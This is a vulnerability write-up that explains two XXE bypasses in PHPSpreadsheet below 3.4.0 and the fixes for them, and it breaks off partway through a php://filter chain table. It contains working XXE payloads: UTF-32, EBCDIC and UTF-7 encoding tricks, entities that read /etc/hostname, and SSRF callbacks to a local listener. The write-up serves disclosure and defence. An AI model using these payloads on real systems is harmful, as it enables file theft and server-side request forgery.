
Analysis of XXE 0days in PHPSpreadsheet < 3.4.0

During a penetration test, you often encounter web applications that are either built on third-party products or developed from scratch. In both cases, external libraries invariably come into play. This practice typically enhances both code quality and security, while also giving penetration testers the chance to delve deep into the component’s source code to uncover new vulnerabilities and potentially gain access to the application.

This is exactly what happened to Antonio Rocco Spataro and Antonio Russo during a penetration test for Unlock Security on an application that utilizes the PHPSpreadsheet library. PHPSpreadsheet is the premier open-source PHP library for reading and writing spreadsheets in various formats, such as Excel and LibreOffice Calc, and it now boasts over 218 million installations along with more than 1,200 projects that rely on it as a dependency.

In this article, we’ll walk you through, step by step, how we managed to uncover two 0day vulnerabilities that enabled an XXE attack, circumventing both the library’s built-in protections and the subsequent patches deployed by its developers.

Setting up the test environment

As is often the case, to protect the client's application and streamline our analysis, we set up a dedicated test environment for the testing process.

To let anyone interested explore this vulnerability, we've made a ready-to-use test environment available, based on devcontainers for VS Code. The project structure is as follows:

.
├── composer.json
├── .devcontainer
│   ├── devcontainer.json
│   └── Dockerfile
├── index.php
├── payload.xlsx
└── .vscode
    └── launch.json

The composer.json file specifies the library name and version to be included in the project; in this case, only PHPSpreadsheet, and it must be a vulnerable version prior to 3.4.0. We opted for version 3.3.0:

{
    "require": {
       "phpoffice/phpspreadsheet": "3.3.0"
    }
}

The .devcontainer/Dockerfile sets up a testing environment with all the necessary dependencies required for the library to function correctly for our purposes:

FROM mcr.microsoft.com/devcontainers/php:8-bullseye

# Install system dependencies
RUN export DEBIAN_FRONTEND=noninteractive && \
    apt-get update && \
    apt-get -y install --no-install-recommends \
        libpng-dev \
        libxml2-dev \
        libzip-dev

# Install PHP extensions
RUN docker-php-ext-install gd xml zip

Within the .devcontainer/devcontainer.json file, instructions are provided for using the Dockerfile, initializing the project, and installing all the essential VS Code extensions to ease PHP code analysis:

{
    "name": "Pentesting PHPSpreadsheet",
    "context": ".",
    "dockerFile": "Dockerfile",
    "customizations": {
        "vscode": {
            "extensions": [
                "xdebug.php-debug"
            ]
        }
    },
    "portsAttributes": {
        "9000": {
            "label": "PHP XDebug",
            "onAutoForward": "ignore"
        }
    },
    "postCreateCommand": "composer install"
}

Next, we create a simple PHP snippet that uses PHPSpreadsheet to open our XLSX payload and print the contents of the active spreadsheet's cells:

<?php
require 'vendor/autoload.php';

use \PhpOffice\PhpSpreadsheet\Spreadsheet;
use \PhpOffice\PhpSpreadsheet\IOFactory;

$spreadsheet = new Spreadsheet();

$inputFileType = 'Xlsx';
$inputFileName = 'payload.xlsx';

$reader = IOFactory::createReader($inputFileType);
$spreadsheet = $reader->load($inputFileName);
$worksheet = $spreadsheet->getActiveSheet();
print_r($worksheet->toArray());

Once the Dev Containers extension is installed in VS Code, we're all set to launch our test environment and begin vulnerability analysis, though not before briefly explaining how the XLSX format works.

The XLSX format

XLSX files have become a widely adopted standard for managing spreadsheets. In essence, an XLSX file is a ZIP archive that contains several XML files structured according to the Office Open XML (OOXML) specifications.

To gain a clearer understanding of the structure and the key files that will be involved in exploiting the vulnerability, let's create a sample XLSX file:

Sample XLSX file

Once the file is saved, you can use the unzip utility to inspect the internal file structure:

$ unzip -l sample-file.xlsx

Archive:  sample-file.xlsx
  Length      Date    Time    Name
---------  ---------- -----   ----
      681  2025-03-02 12:32   xl/_rels/workbook.xml.rels
      878  2025-03-02 12:32   xl/workbook.xml
     2257  2025-03-02 12:32   xl/theme/theme1.xml
     4451  2025-03-02 12:32   xl/styles.xml
     2247  2025-03-02 12:32   xl/worksheets/sheet1.xml
      212  2025-03-02 12:32   xl/sharedStrings.xml
      571  2025-03-02 12:32   _rels/.rels
      731  2025-03-02 12:32   docProps/core.xml
      412  2025-03-02 12:32   docProps/app.xml
     1480  2025-03-02 12:32   [Content_Types].xml
---------                     -------
    13920                     10 files
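The same listing can be produced programmatically. The following is a minimal Python sketch using only the standard zipfile module; the archive is built in memory with two placeholder members so that the example is self-contained, and their contents are illustrative rather than a valid workbook.

```python
import io
import zipfile

# Build a tiny stand-in archive in memory (placeholder contents, not a valid workbook).
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("xl/workbook.xml", "<workbook/>")
    archive.writestr("xl/sharedStrings.xml", "<sst/>")

# An XLSX file opens like any other ZIP archive.
with zipfile.ZipFile(buffer) as archive:
    names = archive.namelist()
    for info in archive.infolist():
        print(f"{info.file_size:>9}  {info.filename}")
```

Pointing zipfile.ZipFile at a real .xlsx path instead of the in-memory buffer should list the same kind of entries shown above.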

Inside this archive, you’ll find documents such as workbook.xml, which defines the overall structure of the file and contains references to the individual spreadsheets:

<!-- xl/workbook.xml -->
...
<sheets>
    <sheet name="FirstSheet" sheetId="1" state="visible" r:id="rId2"/>
</sheets>
...

The sharedStrings.xml file plays a crucial role in managing text strings used in cells. Instead of storing the text directly in each cell, all unique strings are saved in this file so they can be reused multiple times, thus reducing redundancy and optimizing space.

In the sharedStrings.xml file, the root element is <sst> (shared string table), which encompasses all <si> (shared string item) elements. Each <si> contains the text, usually enclosed in a <t> (text) element, or a more complex structure called <r> (RichTextRun) to handle formatted text:

<!-- xl/sharedStrings.xml -->
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
   <si>
      <t xml:space="preserve">this is a string</t>
   </si>
</sst>

The sheet1.xml file contains the actual data for the cells in the first sheet. Cells containing text use the attribute t="s" to indicate that their content is a reference to the shared string table. Inside the cell, the <v> element holds a numeric index that points to the corresponding string in sharedStrings.xml.

<!-- xl/worksheets/sheet1.xml -->
...
<sheetData>
    <row r="1" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
        <c r="A1" s="0" t="s">
            <v>0</v>
        </c>
    </row>
</sheetData>
...
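To make the indirection concrete, here is a minimal Python sketch of how a reader might resolve a cell that points into the shared string table. It is not PHPSpreadsheet's implementation: the two XML snippets are trimmed versions of the files above, and the helper name cell_value is hypothetical.

```python
import xml.etree.ElementTree as ET

MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS = {"m": MAIN}

shared_strings_xml = f"""<sst xmlns="{MAIN}" count="1" uniqueCount="1">
   <si><t xml:space="preserve">this is a string</t></si>
</sst>"""

sheet_xml = f"""<worksheet xmlns="{MAIN}">
  <sheetData>
    <row r="1"><c r="A1" s="0" t="s"><v>0</v></c></row>
  </sheetData>
</worksheet>"""

# One entry per <si>; joining every nested <t> also covers rich-text runs (<r>).
shared = [
    "".join(t.text or "" for t in si.iter(f"{{{MAIN}}}t"))
    for si in ET.fromstring(shared_strings_xml).findall("m:si", NS)
]

def cell_value(cell):
    """Resolve a <c> element: t="s" means <v> holds an index into the shared strings."""
    raw = cell.find("m:v", NS).text
    return shared[int(raw)] if cell.get("t") == "s" else raw

cells = {c.get("r"): cell_value(c) for c in ET.fromstring(sheet_xml).iter(f"{{{MAIN}}}c")}
print(cells)
```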

Each XML file thus plays a specific role in defining the appearance, data, and formatting of the document.

PHPSpreadsheet and the XXE vulnerabilities

Given the extensive reliance on XML files, it might seem natural to use a basic XXE payload to either read system files or trigger HTTP requests. One approach is to unpack the XLSX file, modify one of its XML files by inserting the malicious payload, repackage it as an XLSX archive, and then open it with PHPSpreadsheet.

Let's attempt this by modifying the sharedStrings.xml file as follows:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE sst [
    <!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe">
    %ext;
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
   <si>
      <t xml:space="preserve">&xxe;</t>
   </si>
</sst>
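The unpack, modify and repackage steps can also be scripted. The sketch below is one possible way to do it in Python with the standard zipfile module; the function name replace_member and the stand-in archive are assumptions made for illustration, and a real run would read the bytes of an actual XLSX file instead.

```python
import io
import zipfile

def replace_member(xlsx_bytes: bytes, member: str, new_content: bytes) -> bytes:
    """Return a copy of the archive in which `member` holds `new_content`."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = new_content if item.filename == member else src.read(item.filename)
            dst.writestr(item.filename, data)
    return out.getvalue()

# Stand-in archive with placeholder contents (not a valid workbook).
original = io.BytesIO()
with zipfile.ZipFile(original, "w") as z:
    z.writestr("xl/workbook.xml", "<workbook/>")
    z.writestr("xl/sharedStrings.xml", "<sst/>")

patched = replace_member(original.getvalue(), "xl/sharedStrings.xml", b"<!-- modified -->")

# Read the result back to confirm that only the targeted member changed.
with zipfile.ZipFile(io.BytesIO(patched)) as z:
    patched_member = z.read("xl/sharedStrings.xml")
    untouched_member = z.read("xl/workbook.xml")
print(patched_member, untouched_member)
```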

In this scenario, we expect that an XXE-vulnerable parser would process the sharedStrings.xml file and issue an HTTP request to the specified address to load an external DTD file. When we run our code snippet in the test environment, we get the following output:

Fatal error: Uncaught PhpOffice\PhpSpreadsheet\Reader\Exception: Detected use of ENTITY in XML, spreadsheet file load() aborted to prevent XXE/XEE attacks in /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Security/XmlScanner.php:82

Stack trace:
#0 /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Xlsx.php(123): PhpOffice\PhpSpreadsheet\Reader\Security\XmlScanner->scan('<?xml version="...')
#1 /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Xlsx.php(700): PhpOffice\PhpSpreadsheet\Reader\Xlsx->loadZip('xl/sharedString...', 'http://schemas....')
#2 /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/BaseReader.php(194): PhpOffice\PhpSpreadsheet\Reader\Xlsx->loadSpreadsheetFromFile('./assets/sample...')
#3 /workspaces/phpspreadsheet/index.php(13): PhpOffice\PhpSpreadsheet\Reader\BaseReader->load('./assets/sample...')
#4 {main}
  thrown in /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Security/XmlScanner.php on line 82

PHPSpreadsheet successfully identifies the XXE attempt and halts the process. The next question is: how exactly does it perform this validation?

Security checks in PHPSpreadsheet

As the stack trace indicated earlier, PHPSpreadsheet’s security mechanisms are implemented in the class PhpOffice\PhpSpreadsheet\Reader\Security\XmlScanner, specifically within the scan($xml) method, which is defined as follows:

public function scan($xml): string
{
    $xml = "$xml";

    $xml = $this->toUtf8($xml);

    // Don't rely purely on libxml_disable_entity_loader()
    $pattern = '/\\0?' . implode('\\0?', str_split($this->pattern)) . '\\0?/';

    if (preg_match($pattern, $xml)) {
        throw new Reader\Exception('Detected use of ENTITY in XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
    }

    // …
}

The check operates by scanning the XML for the string <!DOCTYPE, which may be interleaved with null bytes (e.g., \0<\0!\0D\0O\0C\0T\0Y\0P\0E\0) to account for encodings such as UTF-16 (commonly used in Windows).
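As an illustration, the expression can be ported to Python to see what it does and does not match. This is a sketch under the assumption that the scanned string is <!DOCTYPE, as described above; it mirrors the PHP pattern but is not the library's code.

```python
import re

NEEDLE = b"<!DOCTYPE"

# Port of the PHP expression: an optional NUL before, between and after each character.
optional_nul = rb"\x00?"
pattern = re.compile(
    optional_nul
    + optional_nul.join(re.escape(bytes([b])) for b in NEEDLE)
    + optional_nul
)

plain = "<!DOCTYPE sst []>".encode("utf-8")
utf16 = "<!DOCTYPE sst []>".encode("utf-16-le")
harmless = "<sst></sst>".encode("utf-8")

# The doctype is caught both as plain bytes and with one NUL between characters.
print(bool(pattern.search(plain)), bool(pattern.search(utf16)), bool(pattern.search(harmless)))
```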

Before performing this scan, the XML is converted to UTF-8 by the toUtf8($xml) method, whose implementation is as follows:

private function toUtf8(string $xml): string
{
    $charset = $this->findCharSet($xml);
    if ($charset !== 'UTF-8') {
        $xml = self::forceString(mb_convert_encoding($xml, 'UTF-8', $charset));

        $charset = $this->findCharSet($xml);
        if ($charset !== 'UTF-8') {
            throw new Reader\Exception('Suspicious Double-encoded XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
        }
    }

    return $xml;
}

To determine the character encoding used in the XML, the method findCharSet($xml) is employed. This function searches for instances of the string encoding="<encoding>", accommodating any extra spaces and the use of either single or double quotes. If an encoding is found, it is returned (in uppercase); if not, it defaults to UTF-8.

private function findCharSet(string $xml): string
{
    $patterns = [
        '/encoding\\s*=\\s*"([^"]*]?)"/',
        "/encoding\\s*=\\s*'([^']*?)'/",
    ];

    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $xml, $matches)) {
            return strtoupper($matches[1]);
        }
    }

    return 'UTF-8';
}

CVE-2024-47873

At first glance, PHPSpreadsheet's security measures may seem both simple and effective, but are they really foolproof? Under what conditions can an XXE payload slip past all the checks?

The answer lies in the XML specification, specifically in the "Autodetection of Character Encodings (Non-Normative)" section. This part of the standard explains that, since an XML entity that is not in UTF-8 or UTF-16 must begin with an encoding declaration whose first characters are always <?xml, a parser can determine the encoding family by reading just 2 to 4 bytes. In the absence of a byte order mark, the encoding is inferred by matching these bytes against the following table:

  • 00 00 00 3C, 3C 00 00 00, 00 00 3C 00, 00 3C 00 00 correspond to UCS-4 or any other 32-bit encoding in which ASCII characters are encoded using their standard ASCII values.
  • 00 3C 00 3F indicates UTF-16BE, ISO-10646-UCS-2 (big endian), or other 16-bit big endian encodings where ASCII characters remain intact.
  • 3C 00 3F 00 matches UTF-16LE, ISO-10646-UCS-2 (little endian), or similar 16-bit little endian encodings where ASCII characters remain intact.
  • 3C 3F 78 6D represents UTF-8, ISO 646, ASCII, partially ISO 8859, Shift-JIS, EUC, or other 7- or 8-bit encodings, as well as variable-length encodings where the ASCII characters retain their positions, lengths, and values.
  • 4C 6F A7 94 corresponds to the EBCDIC encoding.
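The table can be expressed as a small lookup. The following Python sketch only illustrates the autodetection idea and is not how libxml2 implements it; the function name and the returned labels are made up for this example, and cp037 is used as one representative EBCDIC code page.

```python
def guess_encoding_family(data: bytes) -> str:
    """Map the first four bytes of a BOM-less XML entity to an encoding family."""
    head = data[:4]
    if head in (b"\x00\x00\x00\x3c", b"\x3c\x00\x00\x00",
                b"\x00\x00\x3c\x00", b"\x00\x3c\x00\x00"):
        return "32-bit (UCS-4 / UTF-32)"
    if head == b"\x00\x3c\x00\x3f":
        return "16-bit big endian"
    if head == b"\x3c\x00\x3f\x00":
        return "16-bit little endian"
    if head == b"\x3c\x3f\x78\x6d":
        return "7/8-bit ASCII-compatible"
    if head == b"\x4c\x6f\xa7\x94":
        return "EBCDIC"
    return "unknown"

# The same "<?xml" prefix, serialized in different encodings.
for codec in ("utf-32-be", "utf-16-be", "utf-16-le", "utf-8", "cp037"):
    print(codec, "->", guess_encoding_family("<?xml".encode(codec)))
```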

Because the scan($xml) function only flags an XXE attempt if it finds either the literal string <!DOCTYPE or its variant interleaved with single null bytes (\0<\0!\0D\0O\0C\0T\0Y\0P\0E\0), we can exploit this by using a 32-bit encoding that inserts more than one null byte before each character. For example, the resulting string could look like this: \0\0\0<\0\0\0!\0\0\0D\0\0\0O\0\0\0C\0\0\0T\0\0\0Y\0\0\0P\0\0\0E\0\0\0, that is, three null bytes preceding every ASCII character. To achieve this, we can use either UTF-32BE or UTF-32LE encoding.
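A quick way to check this reasoning is to encode the doctype in UTF-32BE and run it against a Python port of the original expression. This is a sketch, not the library's code; the variable names are chosen for this example.

```python
import re

# Port of the original check: at most one NUL between the characters of "<!DOCTYPE".
original_check = re.compile(
    rb"\x00?" + rb"\x00?".join(re.escape(bytes([b])) for b in b"<!DOCTYPE") + rb"\x00?"
)

doctype = "<!DOCTYPE sst []>"
utf16 = doctype.encode("utf-16-be")
utf32 = doctype.encode("utf-32-be")

print(utf32[:12])                           # three NUL bytes in front of each ASCII character
print(bool(original_check.search(utf16)))   # one NUL per character: detected
print(bool(original_check.search(utf32)))   # three NULs per character: missed
```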

Some might object that our payload is converted to UTF-8 before the security checks run, thereby stripping out the null bytes and invalidating our approach.

However, a closer look at the implementations of the toUtf8($xml) and findCharSet($xml) methods reveals why this isn't the case:

private function toUtf8(string $xml): string
{
    $charset = $this->findCharSet($xml);
    if ($charset !== 'UTF-8') {
        $xml = self::forceString(mb_convert_encoding($xml, 'UTF-8', $charset));

        $charset = $this->findCharSet($xml);
        if ($charset !== 'UTF-8') {
            throw new Reader\Exception('Suspicious Double-encoded XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
        }
    }

    return $xml;
}

private function findCharSet(string $xml): string
{
    $patterns = [
        '/encoding\\s*=\\s*"([^"]*]?)"/',
        "/encoding\\s*=\\s*'([^']*?)'/",
    ];

    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $xml, $matches)) {
            return strtoupper($matches[1]);
        }
    }

    return 'UTF-8';
}

Notice that the conversion to UTF-8 only occurs when the declared encoding isn't UTF-8. However, the encoding is detected using regular expressions that fail to account for possible null bytes, and if none of them matches, the function defaults to returning "UTF-8". Consequently, if our payload (encoding declaration included) is encoded in UTF-32BE, the declaration goes unnoticed and no conversion takes place.
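The fallback can be reproduced with a Python port of findCharSet($xml). The sketch below copies the two regular expressions from the PHP listing; the function name find_charset is ours, and decoding the match as Latin-1 is an implementation detail of this port only.

```python
import re

PATTERNS = [
    rb'encoding\s*=\s*"([^"]*]?)"',   # double-quoted declaration, tried first
    rb"encoding\s*=\s*'([^']*?)'",    # single-quoted declaration
]

def find_charset(xml: bytes) -> str:
    """Python port of findCharSet(): the first matching pattern wins, else UTF-8."""
    for pattern in PATTERNS:
        match = re.search(pattern, xml)
        if match:
            return match.group(1).decode("latin-1").upper()
    return "UTF-8"

declaration = '<?xml version="1.0" encoding="UTF-32BE"?>'
as_ascii = find_charset(declaration.encode("ascii"))
as_utf32 = find_charset(declaration.encode("utf-32-be"))

print(as_ascii)   # the declared encoding is seen
print(as_utf32)   # NUL-interleaved declaration: falls back to the default
```

Since the second call returns the default, the toUtf8($xml) branch that performs the conversion is never entered for such a payload.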

Even though our XML payload isn't converted, it still functions as intended because libxml2, the underlying library PHPSpreadsheet relies on for XML parsing, adheres to the standard. It correctly determines the encoding by reading the first 4 bytes of the payload.

With that in mind, we create our payload in UTF-32BE. For this purpose, we use CyberChef, an online tool that facilitates various encoding conversions.

Payload in UTF-32BE encoding

We copy the payload into CyberChef's input window, select UTF-32BE as the target encoding, and save the resulting file, overwriting the existing sharedStrings.xml. Next, we repackage the files into a ZIP archive with an XLSX extension and run our proof-of-concept, ensuring that an HTTP server is listening on port 1337 (for instance, by running php -S 127.0.0.1:1337):

HTTP request via XXE

Fixing the issue

The first remedy proposed by the PHPSpreadsheet developers involved modifying the regular expression responsible for detecting the doctype. The updated expression now accounts for the presence of multiple null bytes rather than just one. In other words, the original pattern:

$pattern = '/\\0?' . implode('\\0?', str_split($this->pattern)) . '\\0?/'

was replaced with this more robust version:

$pattern = '/\0*' . implode('\0*', mb_str_split($this->pattern, 1, 'UTF-8')) . '\0*/'

Bypassing the fix

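Those paying close attention might recall that the automatically detected encodings also include EBCDIC, which, unlike the UTF-based encodings, uses no null bytes and does not store ASCII characters under their ASCII values. An EBCDIC-encoded payload therefore matches neither the encoding regular expressions nor the doctype pattern, and the security checks are bypassed once again.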

Payload in EBCDIC encoding
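The effect of the first fix and its limit can be checked with a Python port of the patched expression. This is a sketch only: cp037 is one EBCDIC code page, chosen here as an assumption, and the variable names are ours.

```python
import re

# Port of the patched expression: any number of NUL bytes between characters.
patched_check = re.compile(
    rb"\x00*" + rb"\x00*".join(re.escape(bytes([b])) for b in b"<!DOCTYPE") + rb"\x00*"
)

doctype = "<!DOCTYPE sst []>"
utf32 = doctype.encode("utf-32-be")
ebcdic = doctype.encode("cp037")  # assumption: cp037 as a representative EBCDIC code page

print(bool(patched_check.search(utf32)))    # the UTF-32 variant is now caught
print(ebcdic[:9].hex(" "))                  # no NUL bytes and no ASCII values to match
print(bool(patched_check.search(ebcdic)))   # the EBCDIC variant is not caught
```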

To address this issue, the developers restricted the use of the EBCDIC encoding by modifying the findCharSet($xml) method as follows:

private function findCharSet(string $xml): string
{
    if (substr($xml, 0, 4) === "\x4c\x6f\xa7\x94") {
        throw new Reader\Exception('EBCDIC encoding not permitted');
    }
    // …
}

CVE-2024-48917

Following the release of a new PHPSpreadsheet version that patched the previous vulnerability, researchers Antonio Rocco Spataro and Antonio Russo continued analyzing the library. They discovered yet another potential vector for achieving an XXE attack.

Let's revisit the findCharSet($xml) method:

private function findCharSet(string $xml): string
{
    $patterns = [
        '/encoding\\s*=\\s*"([^"]*]?)"/',
        "/encoding\\s*=\\s*'([^']*?)'/",
    ];

    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $xml, $matches)) {
            return strtoupper($matches[1]);
        }
    }

    return 'UTF-8';
}

This function iterates over two regular expressions, checking for an encoding="<encoding>" (double quotes) or encoding='<encoding>' (single quotes) declaration within the XML file. The first match found determines the encoding used.

However, if both patterns match different parts of the XML file, the function will always return the value specified inside double quotes, as it's processed first.

For example, if we craft an XML header like <?xml version="1" encoding='A' encoding="B"?>, the detected encoding would be "B". The same applies to the following case:

<?xml version="1" encoding='A'?>
<root>
    <aTag attribute="value">text</aTag>
    <!--encoding="B"-->
</root>
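The ordering issue is easy to reproduce with a Python port of findCharSet($xml). As before, this is a sketch that reuses the two regular expressions from the PHP listing; the function name find_charset and the sample documents are ours.

```python
import re

def find_charset(xml: bytes) -> str:
    """Python port of findCharSet(): double-quoted pattern first, then single-quoted."""
    for pattern in (rb'encoding\s*=\s*"([^"]*]?)"', rb"encoding\s*=\s*'([^']*?)'"):
        match = re.search(pattern, xml)
        if match:
            return match.group(1).decode("latin-1").upper()
    return "UTF-8"

single_only = b"<?xml version=\"1\" encoding='A'?><root/>"
with_comment = single_only + b'<!--encoding="B"-->'

print(find_charset(single_only))    # A
print(find_charset(with_comment))   # B
```

The position of the double-quoted string in the file does not matter: the first pattern is applied to the whole document before the second one is even tried.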

Why is this useful? In the previous CVE, we established that scan($xml) fails to detect a <!DOCTYPE> declaration when the XML file uses an encoding other than UTF-8 or UTF-16. However, the libxml2 library, which PHPSpreadsheet relies on, can still recognize and correctly process the encoding.

This creates a new XXE vulnerability if we can manipulate the encoding to be recognized as UTF-8 by PHPSpreadsheet (thus bypassing its security checks) while still being parsed correctly by libxml2.

As the autodetection table shows, the sequence 3C 3F 78 6D (the <?xml string) is shared by a whole family of 7- and 8-bit encodings, so it does not identify a single one. Among the encodings of this family that libxml2 can decode is the 7-bit UTF-7. Because several encodings start with the same sequence, we must explicitly declare encoding='UTF-7' to ensure libxml2 interprets the file correctly.

The key advantage of UTF-7 is that it represents data using only ASCII characters, which allows us to mix plain ASCII content (which is also valid UTF-8) with segments encoded in UTF-7. This means we can selectively encode specific characters: encoding < as +ADw- turns <!DOCTYPE into +ADw-!DOCTYPE, making it unrecognizable to PHPSpreadsheet's security checks.

The resulting payload would look like this:

<?xml version = "1.0" encoding='UTF-7'?>
+ADw-!DOCTYPE sst [
    <!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe">
    %ext;
]>

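<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
   <si>
      <t xml:space="preserve">this is a string</t>
   </si>
</sst>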
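The +ADw- sequence is not arbitrary: a UTF-7 shifted sequence is a plus sign, the Base64 of the character's UTF-16BE bytes without padding, and a closing hyphen. The Python sketch below builds it by hand (the helper name utf7_shift is ours) and uses Python's own utf-7 codec only to decode the result.

```python
import base64

def utf7_shift(char: str) -> bytes:
    """Encode one character as a UTF-7 shifted sequence: '+' + base64(UTF-16BE) + '-'."""
    b64 = base64.b64encode(char.encode("utf-16-be")).rstrip(b"=")
    return b"+" + b64 + b"-"

hidden = utf7_shift("<") + b"!DOCTYPE sst ["

print(hidden)                   # the raw bytes contain no "<!DOCTYPE"
print(hidden.decode("utf-7"))   # a UTF-7 aware decoder restores it
```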

However, there's a catch: PHPSpreadsheet will detect the encoding='UTF-7' declaration and convert the XML file to UTF-8, making the malicious payload visible again. We can prevent this by appending a misleading encoding declaration inside an XML comment, such as <!--encoding="UTF-8"-->. Because the double-quoted pattern is checked first, findCharSet($xml) returns UTF-8 and no conversion takes place.

Here's the final payload:

<?xml version = "1.0" encoding='UTF-7'?>
+ADw-!DOCTYPE sst [
    <!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe">
    %ext;
]>

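<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
   <si>
      <t xml:space="preserve">this is a string</t>
   </si>
</sst>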

<!--encoding="UTF-8"-->

Now, we insert this payload into an XLSX file, execute it, and check the result:

Check bypassed via fake encoding

As expected, PHPSpreadsheet fails to detect the attack, and shortly after, we observe an HTTP request to http://127.0.0.1:1337/we_got_xxe.

From blind SSRF to arbitrary file read

So far, we've demonstrated how to achieve blind SSRF through an XXE vulnerability. At first glance, it might seem like we could simply modify our XXE payload to read and exfiltrate data, using something like this:

<!DOCTYPE sst [
    <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
   <si>
      <t xml:space="preserve">&xxe;</t>
   </si>
</sst>

However, by default, libxml does not enable the LIBXML_NOENT option, which is required for replacing entities within an XML file. This restriction applies only to external entities, meaning internal entity substitution still works as expected. For example, with the following payload, the first cell in the XLSX file would contain the string "a sample string":

<!DOCTYPE sst [
    <!ENTITY xxe "a sample string">
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
   <si>
      <t xml:space="preserve">&xxe;</t>
   </si>
</sst>
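Internal entity substitution is ordinary XML behaviour and can be observed with other parsers too. As an illustration only, the Python sketch below parses the same document with the standard ElementTree module, which is backed by expat rather than libxml2, so it shows the XML-level behaviour and not PHPSpreadsheet's code path.

```python
import xml.etree.ElementTree as ET

document = """<!DOCTYPE sst [
    <!ENTITY xxe "a sample string">
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
   <si>
      <t xml:space="preserve">&xxe;</t>
   </si>
</sst>"""

root = ET.fromstring(document)
text = root.find(".//{http://schemas.openxmlformats.org/spreadsheetml/2006/main}t").text
print(text)  # the entity reference has been replaced by its internal value
```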

Now, the key question is: can we exploit this behavior to read a file's contents? Let's start with the following payload:

<!DOCTYPE sst [
    <!ENTITY % hostname SYSTEM "file:///etc/hostname">
    %hostname;
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
   <si>
      <t xml:space="preserve">&xxe;</t>
   </si>
</sst>

This loads the contents of /etc/hostname into the parameter entity hostname, which is then expanded inside the DTD wherever %hostname; appears. However, since nothing defines the xxe entity that the document body references, this alone won't work.

Now, consider a scenario where the hostname itself were something like <!ENTITY xxe "a very unusual hostname">. This would effectively define a new xxe entity, making it available for substitution inside sharedStrings.xml.

If we could somehow force the inclusion of a prefix and a suffix, we could control the structure of the injected entity and use it to leak arbitrary files.
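The idea can be simulated without touching the file system. In the Python sketch below, file_contents is a made-up stand-in for the contents of /etc/hostname, and the wrapped declaration is pasted directly into the internal DTD subset, which is what the expansion of %hostname; would amount to if the file arrived already wrapped. Python's expat-backed ElementTree is used purely for illustration.

```python
import xml.etree.ElementTree as ET

file_contents = "build-host-01"           # hypothetical stand-in for /etc/hostname
prefix, suffix = "<!ENTITY xxe '", "'>"   # the wrapping we would like to force

# What the DTD would contain if the file contents arrived already wrapped.
declaration = prefix + file_contents + suffix

document = f"<!DOCTYPE sst [{declaration}]><sst><si><t>&xxe;</t></si></sst>"
leaked = ET.fromstring(document).find(".//t").text
print(leaked)  # the file contents end up in the shared string
```

The simulation ignores details such as trailing newlines and characters that would break the entity declaration.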

The solution lies in WrapWrap, a tool developed by Ambionics. WrapWrap chains php://filter gadgets to add arbitrary prefixes and suffixes to file contents, effectively transforming raw file data into a usable XML entity.

WrapWrap uses a series of encoding conversions to manipulate character representation, allowing us to prepend and append custom data. Here's an example of how different character encodings can be leveraged:

conversions = {
    b"0": "convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2",
    b"1": "convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4",
    b"2": "convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921",
    b"3": "convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE",
    b"4": "convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE",
    b"5": "convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2",
    b"6": "convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2",
    b"7": "convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4",
    b"8": "convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2",
    b"9": "convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB",
